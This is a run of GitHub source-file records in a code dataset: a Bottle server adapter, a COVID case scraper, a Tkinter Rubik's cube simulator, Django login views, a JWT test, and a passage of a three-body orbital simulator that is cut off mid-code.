input()\n","repo_name":"sapieninja/AdventOfCode","sub_path":"Python/Python15/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"8091394340","text":"from bottle 
import ServerAdapter\n\n\nclass SipperCherootServer(ServerAdapter):\n    \"\"\" Custom Cheroot ServerAdapter implementation to accommodate shutdown, ssl etc. \"\"\"\n    server = None\n\n    def __init__(self, host='127.0.0.1', port=8080,\n                 ssl_enabled=False,\n                 ssl_cert=None,\n                 ssl_key=None,\n                 silent=False):\n        super().__init__(host, port)\n        self.ssl_enabled = ssl_enabled\n        self.ssl_cert = ssl_cert\n        self.ssl_key = ssl_key\n        self.silent = silent\n\n    def run(self, handler):\n        from cheroot import wsgi\n        from cheroot.ssl import builtin\n\n        self.options['bind_addr'] = (self.host, self.port)\n        self.options['wsgi_app'] = handler\n\n        self.server = wsgi.Server(**self.options)\n\n        if self.ssl_enabled:\n            # Configure SSL context with certificates\n            self.server.ssl_adapter = builtin.BuiltinSSLAdapter(\n                self.ssl_cert, self.ssl_key)\n        try:\n            self.server.start()\n        finally:\n            self.server.stop()\n\n    def shutdown(self):\n        self.server.stop()\n        self.server = None\n","repo_name":"leogps/bottle-sipper","sub_path":"sipper_core/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"73408097699","text":"import requests\r\nfrom bs4 import BeautifulSoup\r\n\r\n# KCDC > per-city case status url\r\nurl = \"http://ncov.mohw.go.kr/bdBoardList_Real.do?brdId=1&brdGubun=13&ncvContSeq=&contSeq=&board_id=&gubun=\"\r\n\r\nresponse = requests.get(url)\r\nhtml = BeautifulSoup(response.content, 'lxml')\r\n\r\n\r\n# collection timestamp info\r\ntimehtml = html.select(\"div.timetable\")\r\ntimeinfo = timehtml[0].select_one('p').text\r\n\r\n\r\n# detailed confirmed-case status table by province (data_table)\r\nmgt24 = html.select(\"div.data_table\")\r\n\r\n# thead tag section of the table (columns)\r\ntable_head = mgt24[0].select_one(\"thead\")\r\n\r\n# tbody tag section of the table (rows)\r\ntable_body = mgt24[0].select_one(\"tbody\")\r\n\r\n\r\n\r\n# table column name range\r\ncol_tag = table_head.find_all(\"th\")\r\n\r\n# create a list to store the table column names\r\ncol_name = []\r\n\r\n# append the column names to the list\r\nfor th in range(3,11):\r\n    col_name.append(col_tag[th].text)\r\n\r\n\r\n\r\n# city name tag range\r\ncity_tag = table_body.find_all(\"th\")\r\n\r\n# create a list to store only the city name -> Ulsan[7]\r\ncity_name = []\r\n\r\n# append the city name for Ulsan to the list\r\ncity_name.append(city_tag[7].text)\r\n\r\n\r\n\r\n# confirmed-case count tag range\r\nnumber_tag = table_body.find_all(\"td\")\r\n\r\n# create a list to store Ulsan's confirmed-case info\r\nulsan_daily = []\r\n\r\n# append Ulsan's confirmed-case counts to the list\r\nfor td in range(56,64):\r\n    ulsan_daily.append(number_tag[td].text)\r\n\r\n\r\n\r\n# print the lists\r\nprint(timeinfo)\r\nprint(city_name)\r\nprint(col_name)\r\nprint(ulsan_daily)","repo_name":"jesamkim/python-covid-info-crawling","sub_path":"ulsan_covid19_daily.py","file_name":"ulsan_covid19_daily.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73740443300","text":"# Rubik's cube simulator engine #\r\n#     Created by Alpacah    #\r\n#    27/11/2016     #\r\n\r\nfrom tkinter import *\r\nfrom random import randrange\r\n\r\ndef drawCube():\r\n    global cube\r\n    drawFace(120, 90, 0)\r\n    drawFace(120, 25, 1)\r\n    drawFace(185, 90, 2)\r\n    drawFace(120, 155, 3)\r\n    drawFace(55, 90, 4)\r\n    drawFace(250, 90, 5)\r\n\r\ndef drawFace(startX, startY, face):\r\n    global cube\r\n    colors = [\"#FFFFFF\", \"#FF6600\", \"#0000FF\", \"#FF0000\", \"#00FF00\", \"#BBBB00\"]\r\n    for part in range(9):\r\n        if (part == 3 or part == 6):\r\n            startX -= 60\r\n            startY += 20\r\n        cubeCanvas.create_rectangle(startX + part * 20, startY, startX + part * 20 + 20, 
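\r\n                                    # each sticker is a 20 px square; the face is drawn as a 3x3 grid,\r\n                                    # wrapping to a new row after parts 3 and 6 (see the if above)\r\n                                    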
startY + 20, fill=colors[cube[face][part]], width=2)\r\n\r\ndef moveFace(moveFace):\r\n    global cube\r\n    colors = [\"#FFFFFF\", \"#FF5800\", \"#0051BA\", \"#C41E3A\", \"#009E60\", \"#FFD500\"]\r\n    isReverse = []\r\n    # adjacent faces in clockwise order [face, part0, part1, part2]\r\n    adjacents = [[[1, 6, 7, 8], [2, 0, 3, 6], [3, 2, 1, 0], [4, 8, 5, 2]], #fix\r\n                 [[5, 2, 1, 0], [2, 2, 1, 0], [0, 2, 1, 0], [4, 2, 1, 0]], #fix\r\n                 [[1, 8, 5, 2], [5, 0, 3, 6], [3, 8, 5, 2], [0, 8, 5, 2]], #fix\r\n                 [[0, 6, 7, 8], [2, 6, 7, 8], [5, 6, 7, 8], [4, 6, 7, 8]], #fix\r\n                 [[1, 0, 3, 6], [0, 0, 3, 6], [3, 0, 3, 6], [5, 8, 5, 2]], #fix\r\n                 [[1, 2, 1, 0], [4, 0, 3, 6], [3, 6, 7, 8], [2, 8, 5, 2]]] #fix\r\n    moveList = [2, 5, 8, 1, 4, 7, 0, 3, 6] # defines which part goes where on the moved face\r\n    # save state; list() only makes a shallow copy, so the nested cube array is copied element by element\r\n    savedFace = []\r\n    for i in range(9):\r\n        savedFace.append(cube[moveFace][i])\r\n    savedLine = [\"\", cube[adjacents[moveFace][0][0]][adjacents[moveFace][0][1]], cube[adjacents[moveFace][0][0]][adjacents[moveFace][0][2]], cube[adjacents[moveFace][0][0]][adjacents[moveFace][0][3]]]\r\n\r\n    # move parts in face\r\n    for i in range(9):\r\n        cube[moveFace][i] = savedFace[moveList[i]]\r\n\r\n    # move around faces\r\n    for layer in range(4):\r\n        for part in range(1, 4):\r\n            if (layer < 3):\r\n                cube[adjacents[moveFace][layer][0]][adjacents[moveFace][layer][part]] = cube[adjacents[moveFace][layer+1][0]][adjacents[moveFace][layer+1][part]]\r\n            else:\r\n                cube[adjacents[moveFace][layer][0]][adjacents[moveFace][layer][part]] = savedLine[part] \r\n\r\ndef makeMove(move):\r\n    moves = [[\"U\", 0, 3],[\"U'\", 0, 1],[\"R\", 2, 3],[\"R'\", 2, 1],[\"L\", 4, 3],[\"L'\", 4, 1],[\"D\", 5, 3],[\"D'\", 5, 1],[\"B\", 1, 3],[\"B'\", 1, 1],[\"F\", 3, 3],[\"F'\", 3, 1]]\r\n    # find resource id\r\n    identifier = 0\r\n    for i in range(12):\r\n        if (moves[i][0] == move):\r\n            identifier = i\r\n\r\n    # calculate position\r\n    for i in range(moves[identifier][2]):\r\n        moveFace(moves[identifier][1])\r\n    drawCube()\r\n\r\ndef executeCommand(command):\r\n    # read sequence\r\n    command = command.replace(\" \", \"\").replace(\"²\", \"2\").replace(\"\\n\", \"\").replace(\"\\r\", \"\")\r\n    commands = []\r\n    i = 0\r\n    while i < len(command):\r\n        action = command[i]\r\n        if (i < len(command) - 1):\r\n            if (command[i+1] == \"'\"):\r\n                action = action + \"'\"\r\n                i += 1\r\n            elif (command[i+1] == \"2\"):\r\n                commands.append(action)\r\n                i += 1\r\n\r\n        commands.append(action)\r\n        i += 1\r\n    print(commands)\r\n\r\n    # play sequence\r\n    for i in range(len(commands)):\r\n        makeMove(commands[i])\r\n\r\ndef shuffle():\r\n    commands = [\"U\", \"U'\", \"L\", \"L'\", \"R\", \"R'\", \"D\", \"D'\", \"B\", \"B'\", \"F\", \"F'\"]\r\n    moves = 20\r\n    chain = \"\"\r\n    for i in range(moves):\r\n        chain = chain + commands[randrange(12)]\r\n    print(\"shuffle command: \" + chain)\r\n    executeCommand(chain)\r\n    \r\ndef solve():\r\n    global cube\r\n    cube = [[0, 0, 0, 0, 0, 0, 0, 0, 0], # white\r\n            [1, 1, 1, 1, 1, 1, 1, 1, 1], # orange\r\n            [2, 2, 2, 2, 2, 2, 2, 2, 2], # blue\r\n            [3, 3, 3, 3, 3, 3, 3, 3, 3], # red\r\n            [4, 4, 4, 4, 4, 4, 4, 4, 4], # green\r\n            [5, 5, 5, 5, 5, 5, 5, 5, 5]] # yellow\r\n    drawCube()\r\n\r\n#       1\r\n#     4 0 2 5\r\n#       3\r\n    \r\ncube = [[0, 0, 0, 0, 0, 0, 0, 0, 0], # white\r\n        [1, 1, 1, 1, 1, 1, 1, 1, 1], # orange\r\n        [2, 2, 2, 2, 2, 2, 2, 2, 2], # blue\r\n        [3, 3, 3, 3, 3, 3, 3, 3, 3], # red\r\n        [4, 4, 4, 4, 4, 4, 4, 4, 4], # green\r\n        [5, 5, 5, 5, 5, 5, 5, 5, 5]] # yellow\r\n\r\nroot = Tk()\r\n\r\ncubeCanvas = 
Canvas(root, width=360, height=240)\r\ncubeCanvas.grid(row=0, column=0)\r\ndrawCube()\r\n\r\nframe = Frame(root)\r\nframe.grid(row=0, column=1)\r\n\r\nButton0 = Button(frame, text=\"U\", command=lambda: makeMove(\"U\"))\r\nButton0.grid(row=1, column=1)\r\nButton1 = Button(frame, text=\"B\", command=lambda: makeMove(\"B\"))\r\nButton1.grid(row=0, column=1)\r\nButton2 = Button(frame, text=\"R\", command=lambda: makeMove(\"R\"))\r\nButton2.grid(row=1, column=2)\r\nButton3 = Button(frame, text=\"F\", command=lambda: makeMove(\"F\"))\r\nButton3.grid(row=2, column=1)\r\nButton4 = Button(frame, text=\"L\", command=lambda: makeMove(\"L\"))\r\nButton4.grid(row=1, column=0)\r\nButton5 = Button(frame, text=\"D\", command=lambda: makeMove(\"D\"))\r\nButton5.grid(row=1, column=3)\r\n\r\nLabel(frame, text=\"Reverse\").grid(row=3, column=1)\r\n\r\nButton0 = Button(frame, text=\"U'\", command=lambda: makeMove(\"U'\"))\r\nButton0.grid(row=5, column=1)\r\nButton1 = Button(frame, text=\"B'\", command=lambda: makeMove(\"B'\"))\r\nButton1.grid(row=4, column=1)\r\nButton2 = Button(frame, text=\"R'\", command=lambda: makeMove(\"R'\"))\r\nButton2.grid(row=5, column=2)\r\nButton3 = Button(frame, text=\"F'\", command=lambda: makeMove(\"F'\"))\r\nButton3.grid(row=6, column=1)\r\nButton4 = Button(frame, text=\"L'\", command=lambda: makeMove(\"L'\"))\r\nButton4.grid(row=5, column=0)\r\nButton5 = Button(frame, text=\"D'\", command=lambda: makeMove(\"D'\"))\r\nButton5.grid(row=5, column=3)\r\n\r\ncommandPrompt = Entry(root)\r\ncommandPrompt.grid(row=1, column=0)\r\n\r\ncommandButton = Button(root, text=\"Execute command\", command=lambda: executeCommand(commandPrompt.get()))\r\ncommandButton.grid(row=1, column=1)\r\nresetButton = Button(root, text=\"Solve cube\", command=solve)\r\nresetButton.grid(row=1, column=2)\r\nresetButton = Button(root, text=\"Shuffle cube\", command=shuffle)\r\nresetButton.grid(row=2, column=1)\r\n\r\nprint(\"F2 R' B' U R' L F' L F' B D' R B L2\")\r\nroot.mainloop()\r\n","repo_name":"0xbeefed/PythonRubicksCubeEngine","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6330,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"6134855030","text":"from django.shortcuts import render, redirect\nfrom django.http import HttpResponse\nfrom . 
models import Usuario\n\n# Create your views here.\ndef inicio(request):\n return render(request, 'inicio.html')\n\ndef acceder(request):\n if request.method == 'GET':\n return render(request, 'acceder.html')\n elif request.method == 'POST':\n usuario = request.POST.get('nombreUsuario').lower()\n contrasena = request.POST.get('contrasena')\n ingreso = Usuario.objects.filter(nombreUsuario = usuario, contrasena = contrasena)\n if len(ingreso) != 0:\n usuario_actual = ingreso[0]\n request.session['nombreUsuario'] = usuario_actual.nombreUsuario\n request.session['idUsuario'] = usuario_actual.id\n return HttpResponse(1)\n else:\n return HttpResponse(0)\n\ndef registro(request):\n if request.method == 'GET':\n return render(request, 'registro.html')\n elif request.method == 'POST':\n usuario = request.POST.get('nombreUsuario').lower()\n email = request.POST.get('email')\n contrasena = request.POST.get('contrasena')\n confirmContrasena = request.POST.get('confirmContrasena')\n buscarUsuario = Usuario.objects.filter(nombreUsuario = usuario)\n if len(buscarUsuario) != 0:\n return HttpResponse(1)\n if contrasena == confirmContrasena:\n registro = Usuario(\n nombreUsuario = usuario,\n emailUsuario = email,\n contrasena = contrasena\n )\n registro.save()\n return HttpResponse(2)\n return redirect('acceder')\n else:\n return HttpResponse(0)\n return redirect('registro')\n\ndef menu(request):\n return render(request, 'menu.html')","repo_name":"KevinMartinezMella/MySuperPet","sub_path":"apps/master/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1794,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"7758600901","text":"from jose import jwt\n\nfrom library_app.security import create_access_token\nfrom library_app.settings import Settings\n\nsettings = Settings()\n\n\ndef test_jwt():\n data = {'test': 'test'}\n token = create_access_token(data)\n\n decoded = jwt.decode(\n token, settings.SECRET_KEY, algorithms=[settings.ALGORITHM]\n )\n\n assert decoded['test'] == data['test']\n assert decoded['exp']\n","repo_name":"ricardo-emanuel01/library_app","sub_path":"tests/test_security.py","file_name":"test_security.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"19628758520","text":"\"\"\" AGC Simulation ###\r\n# @author Jae Choi\r\n# 3 Bodies simulation inspired by \r\n# https://github.com/zaman13/Three-Body-Problem-Gravitational-System\r\n\"\"\"\r\n\r\nfrom matplotlib.widgets import Slider, Button, RadioButtons\r\nfrom matplotlib import animation, rc\r\nimport threading as th\r\nimport io\r\nimport serial\r\nimport os\r\nimport pylab as py\r\nimport numpy as np\r\nfrom time import sleep\r\nimport matplotlib\r\nimport string\r\n\r\nmatplotlib.rcParams[\"toolbar\"] = \"None\"\r\n\r\n\r\ndef force_bodies(r_1, r_2, body_1, body_2):\r\n M1 = 0\r\n M2 = 0\r\n F = np.zeros(2)\r\n r = np.zeros(2)\r\n if body_1 == \"earth\" and body_2 == \"commanche\":\r\n M1 = Mc\r\n M2 = Mp\r\n elif body_1 == \"earth\" and body_2 == \"moon\":\r\n M1 = Ml\r\n M2 = Mp\r\n elif body_1 == \"moon\" and body_2 == \"commanche\":\r\n M1 = Mc\r\n M2 = Ml\r\n # Get vector difference between the two bodies\r\n r[0] = r_2[0] - r_1[0]\r\n r[1] = r_2[1] - r_1[1]\r\n # Get magnitude of the force and angle\r\n Fmag = GG * M1 * M2 / (np.linalg.norm(r) + 1e-20) ** 2\r\n theta = np.arctan(np.abs(r[1]) / (np.abs(r[0]) + 1e-20))\r\n F[0] = Fmag * np.cos(theta)\r\n F[1] 
= Fmag * np.sin(theta)\r\n    if r[0] > 0:\r\n        F[0] = -F[0]\r\n    if r[1] > 0:\r\n        F[1] = -F[1]\r\n    return F\r\n\r\n\r\n# Force on the body\r\ndef force(r, body, ro, vo):\r\n    if body == \"commanche\":\r\n        return force_bodies([0, 0], r, \"earth\", \"commanche\") + force_bodies(\r\n            ro, r, \"moon\", \"commanche\"\r\n        )\r\n    if body == \"moon\":\r\n        return force_bodies([0, 0], r, \"earth\", \"moon\") - force_bodies(\r\n            ro, r, \"moon\", \"commanche\"\r\n        )\r\n\r\n\r\n# Acceleration\r\ndef dv_dt(t, r, v, body, ro, vo):\r\n    F = force(r, body, ro, vo)\r\n    if body == \"commanche\":\r\n        a = F / Mc\r\n    if body == \"moon\":\r\n        a = F / Ml\r\n    return a\r\n\r\n\r\n# Differential equation solvers\r\n# ===================================================================\r\ndef RK4Solver(t, r, v, dt, body, ro, vo):\r\n    k11 = v\r\n    k21 = dv_dt(t, r, v, body, ro, vo)\r\n    k12 = v + dt * k21 / 2.0\r\n    k22 = dv_dt(t + dt / 2.0, r + dt * k11 / 2.0, v + dt * k21 / 2.0, body, ro, vo)\r\n    k13 = v + dt * k22 / 2.0\r\n    k23 = dv_dt(t + dt / 2.0, r + dt * k12 / 2.0, v + dt * k22 / 2.0, body, ro, vo)\r\n    k14 = v + dt * k23\r\n    k24 = dv_dt(t + dt, r + dt * k13, v + dt * k23, body, ro, vo)\r\n\r\n    y0 = r + dt * (k11 + 2.0 * k12 + 2.0 * k13 + k14) / 6.0\r\n    y1 = v + dt * (k21 + 2.0 * k22 + 2.0 * k23 + k24) / 6.0\r\n    z = np.zeros([2, 2])\r\n    z = [y0, y1]\r\n    return z\r\n\r\n\r\n# =====================================================================\r\n# Constants\r\nMe = 6e24  # Mass of Earth (kg)\r\nMm = 6.4e23  # Mass of Mars (kg)\r\nMj = 1.9e27  # Mass of Jupiter (kg)\r\nMs = 5.7e26  # Mass of Saturn (kg)\r\nMs = 2e30  # Mass of Sun (kg); note this overrides the Saturn value above\r\nMcsm = 14e3  # Mass of Command Service Module (approx 14,000 kg)\r\nMll = 7.347e22  # Mass of Luna (kg)\r\nG = 6.673e-11  # Gravitational Constant\r\nRe = 1.496e11  # 1 AU - Distance from Earth to the Sun\r\nRm = 3.844e5  # Earth-Moon distance (km)\r\n# Setting bodies' mass values\r\nMp = Me\r\nMc = Mcsm\r\nMl = Mll\r\nSS = 10e3\r\n# Normalization parameters\r\nRR = Rm * SS\r\n# RR = Re\r\nMM = Mp\r\nTT = 365 * 24 * 60 * 60.0\r\nFF = (G * MM**2) / RR**2  # Unit force\r\nGG = (MM * G * TT**2) / (RR**3)\r\nMc = Mc / MM  # Normalized mass of CSM\r\nMp = Mp / MM  # Normalized mass of Planet\r\nMl = Ml / MM  # Normalized mass of Moon\r\nSPSCALE = 2**14  # Conversion factor between single-precision words and floats\r\nSIMAGCSCALE = 10.0  # Normalization factor to keep values between -1 and +1\r\n\r\nt_i = 0  # initial time = 0\r\nt_f = 1200  # final time = ?\r\n\r\nN = 100 * t_f  # Max number of points for the array - 100 points per year\r\nt = np.linspace(t_i, t_f, N)  # time array from t_i to t_f with N points\r\ndt = t[2] - t[1]  # time step (uniform)\r\n\r\n# Initial Conditions\r\nri = [1.0, 0]  # initial position of Command Service Module\r\nrm_i = [5.0, 0]  # initial position of Moon\r\n# Magnitude of Command Service Module's initial velocity\r\nv_i_abs = np.sqrt(Mp * GG / ri[0])\r\n# Magnitude of Moon's initial velocity\r\nvm_i_abs = np.sqrt(Mp * GG / (rm_i[0]))\r\n\r\nprint(\r\n    \"GG: {} FF: {} vi: {} vm_i: {} Mp: {} Ml: {}\".format(\r\n        GG, FF, v_i_abs, vm_i_abs, Mp, Ml\r\n    )\r\n)\r\n\r\n# Initial velocity vector for Command Service Module - along y.\r\nvi = [0, v_i_abs * 1.0]\r\nvmi = [0, vm_i_abs * 1.0]  # Initial velocity vector for Moon\r\n\r\n# Initialization\r\nr = np.zeros([N, 2])  # position vector of Command Service Module\r\nv = np.zeros([N, 2])  # velocity vector of Command Service Module\r\nrm = np.zeros([N, 2])  # position vector of Moon\r\nvm = np.zeros([N, 2])  # velocity vector of
Moon\r\n\r\n# Initializing the arrays with initial values.\r\nt[0] = t_i\r\nr[0, :] = ri\r\nv[0, :] = vi\r\nrm[0, :] = rm_i\r\nvm[0, :] = vmi\r\n\r\n# Function for setting up the animation\r\npy.style.use(\"dark_background\")\r\nfig, ax = py.subplots(figsize=(8, 4.5))\r\n\r\npy.subplots_adjust(left=-0.25)\r\nax.axis(\"square\")\r\nax.set_xlim((-7.2, 7.2))\r\nax.set_ylim((-7.2, 7.2))\r\nax.get_xaxis().set_ticks([]) # enable this to hide x axis ticks\r\nax.get_yaxis().set_ticks([]) # enable this to hide y axis ticks\r\n\r\nax.plot(0, 0, \"o\", markersize=9, markerfacecolor=\"#0077BE\", markeredgecolor=\"#d2eeff\")\r\n(line1,) = ax.plot(\r\n [], [], \"o-\", color=\"#FDB813\", markevery=10000, markerfacecolor=\"#FD7813\", lw=2\r\n) # line for CSM\r\n(line2,) = ax.plot(\r\n [],\r\n [],\r\n \"o-\",\r\n color=\"#f2f2f2\",\r\n markersize=8,\r\n markerfacecolor=\"#595959\",\r\n lw=2,\r\n markevery=10000,\r\n) # line for Moon\r\n\r\n# Title and legends\r\nttl = ax.text(-6.2, 6.3, r\"3-Body Problem: Luna, Earth, Spacecraft\", fontweight=\"bold\")\r\n# Orbital bodies legends at the bottom\r\nax.plot(-6, -6.2, \"o\", color=\"#FDB813\", markerfacecolor=\"#FD7813\")\r\nax.text(-5.5, -6.4, \"Apollo Command Module\")\r\nax.plot(2.4, -6.2, \"o\", color=\"#f2f2f2\", markersize=8, markerfacecolor=\"#595959\")\r\nax.text(2.9, -6.4, \"Moon\")\r\nax.plot(\r\n 5, -6.2, \"o\", markersize=9, markerfacecolor=\"#0077BE\", markeredgecolor=\"#d2eeff\"\r\n)\r\nax.text(5.5, -6.4, \"Earth\")\r\npy.title(\"Celestial Mechanics Simulator - 3 Body Problem Solved Using Runge-Kutta 4\\n\")\r\n\r\nspeed_i = 1.5\r\nradius_i = 1\r\ndelta_f = 0.05\r\na_0 = 0.2\r\naxspeed = py.axes([0.70, 0.43, 0.2, 0.03])\r\naxfinalrad = py.axes([0.70, 0.48, 0.2, 0.03])\r\naxtransfer = py.axes([0.70, 0.53, 0.2, 0.03])\r\naxradius = py.axes([0.70, 0.58, 0.2, 0.03])\r\nsspeed = Slider(axspeed, \"Simulation Speed\", 0.0, 2.5, valinit=speed_i, valstep=delta_f)\r\nsfinalrad = Slider(\r\n axfinalrad,\r\n \"Final Orbit Radius\",\r\n 0.1,\r\n 0.5,\r\n valinit=a_0,\r\n valstep=delta_f,\r\n color=\"gray\",\r\n)\r\nstransfrad = Slider(\r\n axtransfer,\r\n \"Transfer Orbit Radius\",\r\n 0.2,\r\n 4.5,\r\n valinit=radius_i,\r\n valstep=delta_f,\r\n color=\"orange\",\r\n)\r\nsradius = Slider(\r\n axradius,\r\n \"Orbit Radius\",\r\n 0.5,\r\n 4.5,\r\n valinit=radius_i,\r\n valstep=delta_f,\r\n color=\"#FDB813\",\r\n)\r\n\r\naxstatus = py.axes([0.60, 0.12, 0.3, 0.2])\r\naxstatus.patch.set_edgecolor(\"white\")\r\naxstatus.set_yticks([])\r\naxstatus.set_xticks([])\r\ntprogl = axstatus.text(0.05, 0.8, r\"$\\bf{Current\\ Program:}$\")\r\ntprog = axstatus.text(0.50, 0.8, r\"01 Lunar Injection\", color=\"coral\")\r\ntconnl = axstatus.text(0.05, 0.63, r\"$\\bf{Connection\\ Status:}$\")\r\ntconn = axstatus.text(0.50, 0.63, r\"Disconnected\", color=\"red\")\r\ntdata0l = axstatus.text(0.05, 0.46, r\"$\\bf{Initial\\ Delta-V:}$\")\r\ntdata0 = axstatus.text(0.50, 0.46, r\"+0.00000\")\r\ntdata1l = axstatus.text(0.05, 0.29, r\"$\\bf{Final\\ Delta-V:}$\")\r\ntdata1 = axstatus.text(0.50, 0.29, r\"+0.00000\")\r\ntdata2l = axstatus.text(0.05, 0.12, r\"$\\bf{Angle\\ of\\ Bodies:}$\")\r\ntdata2 = axstatus.text(0.50, 0.12, r\"+0.00000\")\r\n\r\n# Global variables for setting velocity\r\ndelta_vc1 = 0.0\r\ndelta_vc2 = 0.0\r\ntarget_vc1 = 0.0\r\ntarget_vc2 = 0.0\r\ntarget_vc2l = 0.0\r\ntarget_vc2p = 0.0\r\nacm = 0.0\r\ntarget_r2 = 0.0\r\npast_prog = 0\r\nset_delta_vc1 = False\r\nset_delta_vc2 = False\r\nset_homann_transfer = False\r\nset_lunar_inject_va = False\r\nset_lunar_inject_vb = 
False\r\nset_lunar_inject = False\r\ncurrent_vc = np.zeros(2)\r\ncurrent_rc = np.zeros(2)\r\ncurrent_rm = np.zeros(2)\r\nindex = 0\r\noffset = 0\r\nreset = False\r\nset_flags = False\r\ndo_lunar_injection = False\r\n\r\n\r\ndef arctan(val):\r\n ret = np.abs(np.arctan(val[1] / val[0] + 1.0e-20))\r\n if val[0] > 0.0 and val[1] > 0.0:\r\n return ret\r\n elif val[0] < 0.0 and val[1] > 0.0:\r\n return np.pi - ret\r\n elif val[0] < 0.0 and val[1] < 0.0:\r\n return np.pi + ret\r\n elif val[0] > 0.0 and val[1] < 0.0:\r\n return 2.0 * np.pi - ret\r\n return ret\r\n\r\n\r\ndef set_vector(mag, arg):\r\n return [mag * np.cos(arg), mag * np.sin(arg)]\r\n\r\n\r\n# Animation function. Reads out the positon coordinates sequentially\r\ndef animate(i):\r\n global set_delta_vc1\r\n global set_delta_vc2\r\n global set_lunar_inject\r\n global set_homann_transfer\r\n global delta_vc2\r\n global index\r\n global offset\r\n global index\r\n global reset\r\n global acm\r\n\r\n index = i\r\n i = i - offset\r\n if reset == True:\r\n reset = False\r\n comanche_trail = 80\r\n moon_trail = 200\r\n current_vc[:] = v[i, :]\r\n current_rc[:] = r[i, :]\r\n current_rm[:] = rm[i, :]\r\n line1.set_data(\r\n r[i : max(1, i - comanche_trail) : -1, 0],\r\n r[i : max(1, i - comanche_trail) : -1, 1],\r\n )\r\n line2.set_data(\r\n rm[i : max(1, i - moon_trail) : -1, 0], rm[i : max(1, i - moon_trail) : -1, 1]\r\n )\r\n # Calculate the next point\r\n [r[i + 1, :], v[i + 1, :]] = RK4Solver(\r\n t[i], r[i, :], v[i, :], dt * sspeed.val, \"commanche\", rm[i, :], vm[i, :]\r\n )\r\n [rm[i + 1, :], vm[i + 1, :]] = RK4Solver(\r\n t[i], rm[i, :], vm[i, :], dt * sspeed.val, \"moon\", r[i, :], v[i, :]\r\n )\r\n theta1 = arctan(r[i])\r\n theta2 = arctan(rm[i])\r\n dr = np.subtract(rm[i], r[i])\r\n if set_homann_transfer and set_delta_vc1:\r\n v[i + 1, :] = v[i, :] + [\r\n target_vc1 * np.cos(theta1 + np.pi / 2),\r\n target_vc1 * np.sin(theta1 + np.pi / 2),\r\n ]\r\n # Fire Delta-V normal to the orbit or straight ahead\r\n # v[i + 1, :] = set_vector(target_vc1, theta1 + np.pi / 2)\r\n set_delta_vc1 = False\r\n set_delta_vc2 = True\r\n acm = acm + theta1\r\n if acm >= 2.0 * np.pi:\r\n acm = acm - 2.0 * np.pi\r\n line1.set_color(\"red\")\r\n print(\"Doing first Hohmann burn: {:.5f} {:.5f}\".format(target_vc1, acm))\r\n elif (\r\n set_lunar_inject\r\n and set_delta_vc1\r\n and theta2 > theta1\r\n and np.isclose(abs(theta2 - theta1), abs(acm), atol=0.05)\r\n ):\r\n print(\"Angle: {:.4f} =?= {:.4f}\", acm, theta2 - theta1)\r\n v[i + 1, :] = [\r\n target_vc1 * np.cos(theta1 + np.pi / 2),\r\n target_vc1 * np.sin(theta1 + np.pi / 2),\r\n ]\r\n set_delta_vc1 = False\r\n set_delta_vc2 = True\r\n line1.set_color(\"red\")\r\n elif (\r\n set_lunar_inject\r\n and set_delta_vc2\r\n and np.isclose(sfinalrad.val, np.linalg.norm(dr), atol=0.01)\r\n ):\r\n theta2 = arctan(np.subtract(rm[i], r[i]))\r\n # delta_vc2 = np.sqrt(Mp * GG / np.linalg.norm(rm[i]))\r\n v[i + 1, :] = [\r\n target_vc2p * np.cos(theta1 + np.pi / 2),\r\n target_vc2p * np.sin(theta1 + np.pi / 2),\r\n ]\r\n # delta_vc2 = np.sqrt(Ml * GG / sfinalrad.val)\r\n v[i + 1, :] += [\r\n target_vc2l * np.cos(theta2 + np.pi / 2),\r\n target_vc2l * np.sin(theta2 + np.pi / 2),\r\n ]\r\n set_lunar_inject = False\r\n set_delta_vc2 = False\r\n line1.set_color(\"#FDB813\")\r\n print(\"Lunar injection\")\r\n elif (\r\n set_homann_transfer\r\n and set_delta_vc2\r\n and np.isclose(theta1, acm, atol=0.01)\r\n # and np.isclose(np.linalg.norm(r[i]), target_r2, atol=0.01)\r\n ):\r\n v[i + 1, :] = v[i, :] + [\r\n 
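# second burn of the transfer: once the craft's position angle theta1\r\n            # reaches acm, add the delta-v tangentially (90 degrees ahead of theta1)\r\n            # to circularize at the target radius\r\n            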
target_vc2 * np.cos(theta1 + np.pi / 2),\r\n target_vc2 * np.sin(theta1 + np.pi / 2),\r\n ]\r\n set_delta_vc2 = False\r\n set_homann_transfer = False\r\n print(\"Doing second Hohmann burn: {:.5f} {:.5f}\".format(target_vc2, theta1))\r\n line1.set_color(\"#FDB813\")\r\n tm_yr = \"Elapsed time = {:.2f} units {:.5f} =?= {:.5f}\".format(\r\n t[i] * sspeed.val, theta1, acm\r\n )\r\n ttl.set_text(tm_yr)\r\n return (line1, line2, ttl)\r\n\r\n\r\ndef init():\r\n line1.set_data([], [])\r\n line2.set_data([], [])\r\n ttl.set_text(\"\")\r\n return (line1, line2, ttl)\r\n\r\n\r\n# Call animation function\r\nanim = animation.FuncAnimation(\r\n fig, animate, init_func=init, frames=None, interval=5, blit=True\r\n)\r\n\r\n\r\ndef spplistener():\r\n global target_vc1\r\n global target_vc2\r\n global target_vc2l\r\n global target_vc2p\r\n global acm\r\n global target_r2\r\n global past_prog\r\n global set_delta_vc1\r\n global set_delta_vc2\r\n global set_homann_transfer\r\n global set_lunar_inject_va\r\n global set_lunar_inject_vb\r\n global set_lunar_inject\r\n global current_rc\r\n global current_rm\r\n global btConn\r\n global set_flags\r\n global counter\r\n\r\n print(\"Connection is Sucessful. Attempting to listen\")\r\n counter = 0\r\n while btConn.is_open:\r\n ss = btConn.readline()\r\n if len(ss) < 5:\r\n continue\r\n try:\r\n # Read parameters from the ESP32\r\n str_bytes = ss.decode(\"utf-8\")\r\n 